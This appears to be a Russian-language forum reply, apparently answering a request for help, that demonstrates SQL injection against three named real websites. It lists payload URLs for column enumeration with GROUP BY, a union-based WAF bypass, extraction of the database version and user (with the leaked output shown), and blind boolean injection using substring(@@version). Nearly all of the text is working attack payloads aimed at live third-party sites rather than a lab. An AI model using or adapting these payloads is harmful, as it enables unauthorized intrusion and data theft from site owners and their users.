Сообщение от
FunOfGun
Заарнее благодарен
Инъекция в
числовом параметре
Определим количество столбцов (смотрим низ страницы)
http://www.timesworld24.com/cat-news-details.php?id=1+group+by+7+--+#.UR8NhG-rEhH TRUE
http://www.timesworld24.com/cat-news-details.php?id=1+group+by+8+--+#.UR8NhG-rEhH FALSE
Обходим WAF
http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,2,3,4,5,6,7)+--+
Добиваемся вывода
http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,
concat_ws(0x3a,version(),user()),3,4,5,6,7)+--+#.UR8NQW-rEhH
5.5.23-55:timeswor_n2031t2@localhost
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1='1
Инъекция в
строковом параметре
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+ 25+--+ TRUE
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+ 26+--+ FALSE
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=2+u nion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,'25#+--+
Данные передаются в UPDATE запрос, а значит финт ушами не прокатит.
Остаётся BLIND
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=if( substring((
@@version),1,1)=4,1,2)+--+
Ну или более привычный вам
http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+subst ring((
@@version),1,1)=4+--+
Есть возможность крутить как Error-Based, но её уже предложили выше.
http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27
Инъекция в
числовом параметре
Добиваемся вывода
http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27+and+1=2+union +select+1,
unhex(hex(@@version)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17